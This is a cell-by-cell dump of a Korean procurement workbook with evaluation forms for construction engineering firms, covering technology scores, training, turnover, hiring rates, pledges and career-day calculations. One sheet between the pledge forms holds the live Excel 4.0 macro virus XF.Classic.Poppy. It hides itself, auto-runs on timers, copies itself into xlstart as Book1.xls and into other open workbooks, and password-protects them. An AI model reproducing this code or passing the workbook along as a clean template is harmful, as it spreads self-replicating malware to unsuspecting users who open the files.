A3: 구분 | B3: 인 정 기관명 | C3: 개발내용 | D3: 등록번호 | E3: 보호기간 | J3: 기술 개발자수 | K3: 기준점수 | L3: 해당 점수
A5: 신기술 | B5: 국토부 | C5: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D5: 제 ㅇㅇㅇ호 | E5: 37240 | F5: 38335 | J5: 1 | K5: 2 | L5: =K5/J5 -> 2
A7: 신기술 | B7: 국토부 | C7: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D7: 제 ㅇㅇㅇ호 | E7: 37240 | F7: 38335 | J7: 1 | K7: 2 | L7: =K7/J7 -> 2
A9: 신기술 | B9: 국토부 | C9: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D9: 제 ㅇㅇㅇ호 | E9: 37240 | F9: 38335 | J9: 1 | K9: 2 | L9: =K9/J9 -> 2
K11: 소계 | L11: =SUM(L5:L10) -> 6
A13: ○ 활용실적
A14: 구분 | B14: 인정 기관명 | C14: 개발내용 | D14: 지정번호 (활용년도) | E14: 고시일자 | F14: 만료일자 | G14: 실적건수(건) | H14: 사용실적 가중치 | J14: - | K14: 기준 점수 | L14: 해당 점수
G15: 실적금액(억원)
A16: 신기술 | C16: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D16: 제ㅇㅇㅇ호 (2007) | E16: 38460 | F16: 41381 | G16: 3 | H16: 1 | K16: 0.5 | L16: =K16*H16 -> 0.5
G17: 20
A18: 신기술 | C18: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D18: 제ㅇㅇㅇ호 (2008) | E18: 39190 | F18: 41381 | G18: 3 | H18: 1 | K18: 0.5 | L18: =K18*H18 -> 0.5
G19: 10
K20: 소계 | L20: =SUM(L16:L19) -> 1
A21: 구분 | B21: 인정 기관명 | C21: 개발내용 | D21: 등록번호 (활용년도) | E21: 출원일자 | F21: 존속(예정)기간 만료일 | G21: 실적건수(건) | H21: 사용실적 가중치 | I21: 경과기간 | J21: 경과기간 가중치 | K21: 기준 점수 | L21: 해당 점수
G22: 실적금액(억원)
A23: 특허 | C23: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D23: 10-1100000 (2013) | E23: 40100 | F23: 41381 | G23: 5 | H23: 1 | I23: 1 | J23: 0.5 | K23: 0.3 | L23: =K23*H23*J23 -> 0.15
G24: 10
A25: 특허 | C25: ㅇㅇㅇㅇㅇㅇㅇㅇㅇ | D25: 10-1100000 (2013) | E25: 40100 | F25: 41381 | G25: 5 | H25: 1 | I25: 1 | J25: 0.5 | K25: 0.3 | L25: =K25*H25*J25 -> 0.15
G26: 10
K27: 소계 | L27: =SUM(L23:L26) -> 0.3
A29: 붙임 : 1. 신기술지정서 및 실적확인서 사본("사실과과 상위없음" 인감 날인)제출 가능
A30: 2. 특허증 사본(등록원부 및 최초 출원인 확인용은 원본)
A31: 3. 실용신안등록증 사본(등록원부 및 최초 출원인 확인용은 원본)
A32: 4. 건설신기술의 선행기술조사 관련 서류(국토교통과학기술진흥윈에 등재된 자료 등)_ 필요시 제출
A33: 주 ) 1. 위의 서류 증서는 사본제출이 가능하며 사본제출 시 사실과상이없음 명시하고 사용인감 날인바람
A34: 2. 위의 서류를 첨부하지 않았을 경우 평가에서 제외함

Sheet 11. 교육훈련
A1: 11. 교육훈련
B2: 교육 훈련 내역
B3: 이름 | C3: 교육훈련기관 | D3: 교육종류 | E3: 교육기간 | F3: 평점 | G3: 관련 법적 근거
G4: 예) 건기법 제20조 등
B11: 계
A12: * 교육수료증 상에 건설기술진흥법 제20조 등 또는 관련 교육기관이 건설기술법 등에 지정된 기관임을 확인할 수 있는 증거서류를 반드시 첨부하여야 함

Sheet 12. 교체빈도
A1: 12. 교체빈도
A2: 구분 | B2: 회사명 | C2: 교체빈도율 | H2: 평가점수
C3: 5%미만 | D3: 5%이상 10%미만 | E3: 10%이상 15%미만 | F3: 15%이상 20%미만 | G3: 20%이상
A4: 건설사업관리용역업자 | C4: 5 | D4: 2.5 | E4: 2 | F4: 1 | G4: 0
B9: 계 | H9: 3
A10: 참여기술자 | B10: 이름 | C10: 최근 1년간 교 체 건 수 | E10: 감점 | G10: 구분
G11: 상주감리원
G16: 비상주감리원
B21: 소계 | H21: 2
A22: 계
A24: (참여감리원전체를 대상)
A25: 감점 처리 방법 | B25: 상주기술자 | C25: 최근 1년간 교체 1회당 0.25점 감점
B26: 기술지원기술자 | C26: 최근 1년간 교체 1회당 0.1점 감점

Sheet 13.건설기술인 신규고용률
A1: 13. 청년신규기술자의 참여
B3: 최근 1년간 평균 고용인원 | O3: 적용비율 | P3: 점수
B4: 12개월전 | C4: 11개월전 | D4: 10개월전 | E4: 9개월전 | F4: 8개월전 | G4: 7개월전 | H4: 6개월전 | I4: 5개월전 | J4: 4개월전 | K4: 3개월전 | L4: 2개월전 | M4: 1개월전 | N4: 평균고용인원(A)
B5: 305 | C5: 319 | D5: 323 | E5: 332 | F5: 337 | G5: 338 | H5: 341 | I5: 346 | J5: 353 | K5: 353 | L5: 350 | M5: 351 | N5: =ROUNDUP(SUM(B5:M5)/12,0) -> 338 | O5: =N8/N5 -> 0.050295858 | P5: =IF(O5>=4%,0.4,IF(O5>=3%,0.3,IF(O5>=2%,0.2,IF(O5>=1%,0.1,0)))) -> 0.4 | Q5: =P5 -> 0.4
B6: 최근 1년간 신규 건설기술인 고용인원
B7: 12개월전 | C7: 11개월전 | D7: 10개월전 | E7: 9개월전 | F7: 8개월전 | G7: 7개월전 | H7: 6개월전 | I7: 5개월전 | J7: 4개월전 | K7: 3개월전 | L7: 2개월전 | M7: 1개월전 | N7: 신규고용인원(C)
B8: 1 | C8: 1 | D8: 3 | E8: 1 | F8: 3 | G8: 2 | H8: 2 | I8: 0 | J8: 1 | K8: 0 | L8: 3 | M8: 0 | N8: =SUM(B8:M8) -> 17
B10: 주) 신규 건설기술인은 현재 해당업체 재직 중인 자로 건설기술인 경력관리 수탁기관의 경력확인서에 최초로 입사등록된 자(이전 건설분야 근무경력이 없는 자)에 한한다.
B11: 주) 최근 1년간 평균 고용인원은 건설기술인 경력관리 수탁기관에 신고한 자로서 해당업체의 기술인 재직인원(월말 단위)을 월단위로 평균하여 산정한다.(각 수탁기관의 건설기술인 신규고용율 확인서를 합산평가)
B12: 주) 건설엔지니어링사업자 등록일로부터 6개월이 경과된 업체인 경우에만 해당한다.
B13: 붙임 | C13: 1. 신규 건설기술인 관련협회 경력확인서 1부.
C14: 2. 기타 증빙자료(기술인경력증명서, 4대보험가입증명서 등) 1부.
B16: ※ 증빙서류는 가격 개찰 이후에 제출합니다.
D22: 조달청 건설엔지니어링사업자 사업수행능력 세부평가기준 (2025. 11. 28. 시행 2026. 1. 1.)
D24: ㅇ 최근 1년간 신규고용인원 / 최근 1년간 평균 고용인원×100 (%)
D26: 비율 (%) | E26: 1%이상 2%미만 | F26: 2%이상 3%미만 | G26: 3%이상 | H26: 4%이상
G27: 4%미만
D28: 가산점수 | E28: 0.1점 | F28: 0.2점 | G28: 0.3점 | H28: 0.4점

Sheet 14.공사비절감기여 기술자
B2: 14. 공사비절감 감리원
B3: 구분 | C3: 기술자 성명 | D3: 발주청 | E3: 용역명 | F3: 절감금액 | G3: 절감율 | H3: 점수산출 | J3: 점수
H4: 건당배접 | I4: 가중치
B5: 상주 | C5: OOO | E5: OOO | F5: 6.2 | G5: 0.004 | H5: 0.5 | I5: 0.8 | J5: =H5*I5 -> 0.4
B7: 비상주 | C7: OOO | E7: OOO | F7: 4.5 | G7: 0.008 | H7: 0.1 | I7: 0.8 | J7: =H7*I7 -> 0.08
F8: 3.2 | G8: 0.003 | H8: 0.1 | I8: 0.5 | J8: =H8*I8 -> 0.05
B13: 합 계 | J13: =SUM(J5:J12) -> 0.53
B14: 첨부 : 발주청 증명서 1부.

Sheet 15.부패행위 관련자
A1: 15. 부패행위 관련자
A2: 부패행위 감리전문회사 | B2: 처분(처벌)일 | C2: 피해금액 | D2: 피해금액 비율 | E2: 감점
A3: OOOOO
A5: 부패행위 감리원 | B5: 처분(처벌)일 | C5: 피해금액 | D5: 피해금액 비율 | E5: 감점
A6: OOO
A12: 합 계

Sheet 16. 업무중첩도
A1: 16. 업무중첩도
A2: 구분 | B2: 이 름 | D2: 용 역 명 | E2: 용역기간 | F2: 건수
A3: 책임 기술자
A6: 보조기술자
A11: 기술지원기술자
A17: 계
A19: * 업무중첩도 참여기술자수에 따라 나누어 계산하지 않음

Sheet 17. 서약서
A1: 17. 서 약 서
A3: 관리번호
A5: 용 역 명
A7: 입찰일시
A9: 본 업체는 귀 청에서 발주하는 상기용역의 사업수행능력 평가자료를
A10: 제출함에 있어 평가자료의 허위기재 또는 부실한 자료작성 및 중대한
A11: 오류 (제출한 평가자료중 입찰공고일 기준하여 상주기술자의 이중배치
A12: 기술지원기술자의 당해용역 포함 10개이상의 현장배치, 부정당업자 제재
A13: 및 부실벌점 등 평가점수와 중대한 관계가 있는 서류에 하자가 발생할
A14: 경우)로 인하여 초래되는 평가상의 불이익은 물론 평가대상에서 제외,
A15: 입찰참가 대상에서 제외 등 귀 청의 어떠한 처분에도 이의를 제기하지
A16: 않을 것임을 서약합니다.
D20: 2026. . .
C24: 주 소
C26: 업체명
C28: 대표자 인
A33: 조달청장 귀하

Sheet 18. 확인서
A1: 18. 확 인 서
A3: 관리번호
A5: 용 역 명
A7: 수요기관명
A9: 본 업체(인)는 0000 수요 " 0000000 민간투자(BTL)시설사업 건설사업관리용역"
A10: 용역업자 선정과 관련하여 동 사업에 참여한 사업시행자(계열사 포함)와
A11: 아무런 관련이 없음을 확인하며, 건설사업관리용역업자로 선정될 경우 관계법령에 따라
A12: 성실히 건설사업관리업무를 수행할 것임을 확인합니다.
D20: 2023. . .
C24: 주 소
C26: 업체명
C28: 대표자 인
A33: 조달청장 귀하

Sheet --------
A1: Sheet1 | C1: =WORKBOOK.HIDE("XL4Poppy") -> FALSE
A2: 최초pq작성자료-설계(누원중기준).xls
A3: C:\PROGRAM FILES\MICROSOFT OFFICE\OFFICE\xlstart\Book1. | C3: **Auto and On Sheet Starts Here**
A4: #N/A | C4: =RUN(C18) -> FALSE
C5: =ERROR(TRUE, _2_) -> #NAME?
C6: =#N/A -> #N/A
A7: Classic.Poppy by VicodinES | C7: =RETURN() -> #NAME?
A8: With Lord Natas | C8: =END.IF() -> #NAME?
A9: An Excel Formula Macro Virus (XF.Classic) | C9: =ERROR(FALSE) -> #NAME?
A10: Hydrocodone/APAP 10-650 For Your Computer | C10: =RUN(A21) -> FALSE
A11: (C) The Narkotic Network 1998 | C11: =ON.TIME("6:30:00 PM", "Hello") -> FALSE
C12: =ON.TIME("6:30:00 AM", "Morning") -> FALSE
C13: =ON.SHEET(,"Poppy",TRUE) -> FALSE
A14: **Simple Payload** | C14: =RETURN() -> #NAME?
A15: =ALERT("XF.Classic.Poppy by VicodinES", 2) -> FALSE
A16: =ALERT("ⓒ 1998 The Narkotic Network", 2) -> FALSE
A17: =RETURN() -> #NAME? | C17: **Set Our Values and Paths**
C18: =SET.VALUE($A$3,(_xlfn.SINGLE(GET.WORKSPACE(32)) & "\xlstart\Book1.")) -> #NAME?
C19: =SET.NAME("Document_array", DOCUMENTS()) -> #NAME?
A20: **Add New Workbook, Infect It, Save It As Book1.xls** | C20: =SET.VALUE($A$1,_xlfn.SINGLE( INDEX(_3_,2))) -> #NAME?
A21: =_xlfn.SINGLE(IF(FILES(A3)="Book1.",0,99)) -> #NAME? | C21: =SET.VALUE($A$2,_xlfn.SINGLE( INDEX(_3_,1))) -> #NAME?
A22: =ERROR(TRUE,_4_) -> #NAME? | C22: =SET.VALUE($A$4,_xlfn.SINGLE(GET.DOCUMENT(3,"["&A1&"]"&"XL4Poppy"))) -> #NAME?
A23: =#N/A -> #N/A | C23: =RETURN() -> #NAME?
A24: =RETURN() -> #NAME?
A25: =END.IF() -> #NAME?
A26: =NEW(1) -> FALSE | C26: **Infect Workbook**
A27: =WORKBOOK.INSERT(1) -> FALSE | C27: =RUN(C19) -> FALSE
A28: =WORKBOOK.INSERT(1) -> FALSE | C28: =ERROR(TRUE,_1_) -> #NAME?
A29: =ACTIVATE.PREV() -> FALSE | C29: =#N/A -> #N/A
A30: =RUN(C18) -> FALSE | C30: =RETURN() -> #NAME?
A31: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE | C31: =ERROR(FALSE) -> #NAME?
A32: =WORKBOOK.NAME("Sheet3","Sheet99") -> FALSE | C32: =ACTIVATE.PREV() -> FALSE
A33: =WORKBOOK.NAME("Sheet1","Sheet3") -> FALSE | C33: =RUN(C19) -> FALSE
A34: =WORKBOOK.NAME("Sheet99","Sheet1") -> FALSE | C34: =WORKBOOK.COPY("XL4Poppy",A1) -> FALSE
A35: =PROTECT.DOCUMENT(TRUE,,"VicodinES",TRUE) -> FALSE | C35: =END.IF() -> #NAME?
A36: =WORKBOOK.PREV() -> FALSE | C36: =RETURN() -> #NAME?
A37: =WORKBOOK.PREV() -> FALSE
A38: =WORKBOOK.PREV() -> FALSE
A39: =SAVE.AS(A3) -> FALSE | C39: =APP.TITLE("XF.Classic.Poppy") -> #NAME?
A40: =FILE.CLOSE() -> FALSE | C40: =MESSAGE(TRUE, "VicodinES and Lord Natas greet you a good morning!") -> FALSE
A41: =RETURN() -> #NAME? | C41: =RETURN() -> #NAME?

Sheet 19. 참여기술자 동의서
A1: 18. 참여기술자 동의서
A4: 본인은 0000 수요 " 0000000 건설사업관리용역"의 사업수행능력평가에
A5: 건설사업관리기술자로 참여하는 것에 동의하며, 건설사업관리기술자로 투입될 경우
A6: 관계법령에 따라 성실히 건설사업관리업무를 수행할 것임을 확인합니다.
B8: 참여기술자 | D8: 서명(또는 인) | F8: 참여기술자 | H8: 서명(또는 인)
B9: 강 o o | F9: 김 o o
D15: 2023. . .
C19: 주 소
C21: 업체명
C23: 대표자 인
A28: 조달청장 귀하

Sheet 20.적격심사 기술자경력(지방계약법)
A1: 20. 해당 용역의 사업 책임 및 분야별 책임기술자 경력 평가
A2: ※ 경력 기산일은 건설기술인력의 경력인정 방법 절차 기준 개정(국토부, 2010.2.3.) 이후부터 산정
A3: ★ 경력증명서의 용역명 등 해당사항에 표시(형광펜, 사인펜 등)하여 주시기 바랍니다.
A5: 20-1. 기술자 해당 용역 경력
A6: 이 름 | D6: 생년월일 | H6: 용역명 | R6: 발주처 | V6: 참여기간 | AB6: 책임정도 | AE6: 참여일수
A7: 가가가 | D7: 79.03.01 | H7: AAA | V7: 40212 | Y7: 40247 | AE7: =Y7-V7+1 -> 36
H8: BBB | V8: 40267 | Y8: 40297 | AE8: =IF(V8>Y7,Y8-V8+1,Y8-Y7) -> 31
H9: CCC | V9: 40210 | Y9: 40512 | AE9: =IF(V9>Y8,Y9-V9+1,Y9-Y8) -> 215
H10: DDD | V10: 40527 | Y10: 40908 | AE10: =IF(V10>Y9,Y10-V10+1,Y10-Y9) -> 382
H11: EEE | V11: 40909 | Y11: 42431 | AE11: =IF(V11>Y10,Y11-V11+1,Y11-Y10) -> 1523 | AI11: 42431
H12: FFF | V12: 41365 | Y12: 41790 | AE12: =IF(V12>Y11,Y12-V12+1,Y12-Y11) -> -641 | AH12: 삭제 | AI12: 41790 | AL12: 용역완수일이 2016-03-02 이전이므로 중첩되는 용역임
H13: GGG | V13: 41791 | Y13: 42348 | AE13: =IF(V13>Y12,Y13-V13+1,Y13-Y12) -> 558 | AH13: 삭제 | AI13: 42348
H14: HHH | V14: 42370 | Y14: 42420 | AE14: =IF(V14>Y13,Y14-V14+1,Y14-Y13) -> 51 | AH14: 삭제 | AI14: 42420
A16: 20-1-1. 평가대상기술자 해당 용역 전체경력일 산정 방법
A17: : 20-1. 평가대상기술자 해당 용역 경력 중 참여일수가 마이너스인 용역 및 녹색으로 칠해진 용역을 삭제 후 산정 (참여기간이 중첩되는 용역임)
A18: 이 름 | D18: 생년월일 | H18: 용역명 | R18: 발주처 | V18: 참여기간 | AB18: 책임정도 | AE18: 참여일수
A19: 가가가 | D19: 79.03.01 | V19: 40212 | Y19: 40247 | AE19: =Y19-V19+1 -> 36
V20: 40267 | Y20: 40297 | AE20: =IF(V20>Y19,Y20-V20+1,Y20-Y19) -> 31
V21: 40210 | Y21: 40512 | AE21: =IF(V21>Y20,Y21-V21+1,Y21-Y20) -> 215
V22: 40527 | Y22: 40908 | AE22: =IF(V22>Y21,Y22-V22+1,Y22-Y21) -> 382
V23: 40909 | Y23: 42431 | AE23: =IF(V23>Y22,Y23-V23+1,Y23-Y22) -> 1523
A24: 계 | D24: 건설분야전체경력 | AE24: =SUM(AE19:AE23) -> 2187
A25: 나나나 | D25: 69.01.01 | AE25: =Y25-V25+1 -> 1
AE26: =IF(V26>Y25,Y26-V26+1,Y26-Y25) -> 0
AE27: =IF(V27>Y26,Y27-V27+1,Y27-Y26) -> 0
AE28: =IF(V28>Y27,Y28-V28+1,Y28-Y27) -> 0
AE29: =IF(V29>Y28,Y29-V29+1,Y29-Y28) -> 0
A30: 계 | D30: 건설분야전체경력 | AE30: 1500
A31: 다다다 | D31: 66.01.02 | AE31: =Y31-V31+1 -> 1
AE32: =IF(V32>Y31,Y32-V32+1,Y32-Y31) -> 0
AE33: =IF(V33>Y32,Y33-V33+1,Y33-Y32) -> 0
AE34: =IF(V34>Y33,Y34-V34+1,Y34-Y33) -> 0
AE35: =IF(V35>Y34,Y35-V35+1,Y35-Y34) -> 0
A36: 계 | D36: 건설분야전체경력 | AE36: 1420
A38: 20-1-2. 사업책임기술자 , 상주, 기술지원기술자의 사업책임, 분야별책임 등 해당 경력일 산정 방법
A39: 20-1. 사업책임기술자 등 해당 용역 경력 중 책임정도에 따라 산정 (단, 참여기간이 중첩되는 용역일 경우 우선순위를 적용하여 산정)
A40: 예 시 | D40: 생년월일 | H40: 용역명 | R40: 발주처 | V40: 참여기간 | AB40: 책임정도 | AE40: 경력일
A41: 가가가 | D41: 79.03.01 | AH41: 중복기간 제외
V42: 40267 | Y42: 40297 | AB42: 상주 | AE42: =IF(V42>Y41,Y42-V42+1,Y42-Y41) -> 31 | AH42: 전체용역기간
V44: 40909 | Y44: 42431 | AB44: 기술지원 | AE44: =IF(V44>Y43,Y44-V44+1,Y44-Y43) -> 1523
A45: 계 | D45: 해당경력 산정 | AE45: =SUM(AE41:AE44) -> 1554
A46: 나나나 | V46: 40224 | Y46: 40522 | AB46: 책임건설사업관리 | AE46: =Y46-V46+1 -> 299
V47: 41395 | Y47: 41698 | AB47: 상주 | AE47: =IF(V47>Y46,Y47-V47+1,Y47-Y46) -> 304
A50: 계 | D50: 해당경력 산정 | AE50: =SUM(AE46:AE49) -> 603
A51: 다다다 | V51: 40240 | Y51: 41284 | AB51: 상주 | AE51: =Y51-V51+1 -> 1045
V52: 42400 | Y52: 42635 | AB52: 기술지원 | AE52: =IF(V52>Y51,Y52-V52+1,Y52-Y51) -> 236
V53: 41310 | Y53: 41850 | AE53: -
A55: 계 | D55: 해당경력 산정 | AE55: =SUM(AE51:AE54) -> 1281
A57: 20-2. 사업책임 및 분야책임기술자 평가
A58: 성명 | D58: 전체경력 (단위:일) | G58: 건설사업관리 | V58: 설계
G60: 건진법 | J60: 책임건설 사업관리기술자 | N60: 상주기술자 | R60: 기술지원기술자 | V60: 사업 책임기술자 | Z60: 분야별 책임기술자 | AD60: 참여기술자
G62: 주택법 | J62: 총괄감리원 | N62: 상주감리원, 상주감리원(신규) | R62: 비상주감리원
G64: 건축법 | J64: 책임 기술자 | N64: 분야기술자, 상주(건축사보)기술자 | R64: 기술지원기술자
A66: =A7 -> 가가가 | D66: =AE24 -> 2187 | J66: =AE41 -> 0 | N66: =AE42+AE43 -> 31 | R66: =AE44 -> 1523
A68: 나나나 | D68: =AE30 -> 1500 | J68: =AE46 -> 299 | N68: =AE47 -> 304
A70: 다다다 | D70: =AE36 -> 1420 | N70: =AE51 -> 1045 | R70: =AE52 -> 236
A73: 평가 | G73: 합산 비율 | N73: 배점
G75: =((J66+N66+(R66*1/2))+(J68+N68+(R68*1/2))+J70+N70+(R70*1/2))/(D66+D68+D70) -> 0.50097905 | N75: =IF(G75>0.3,1,IF(G75>0.2,0.5,0)) -> 1
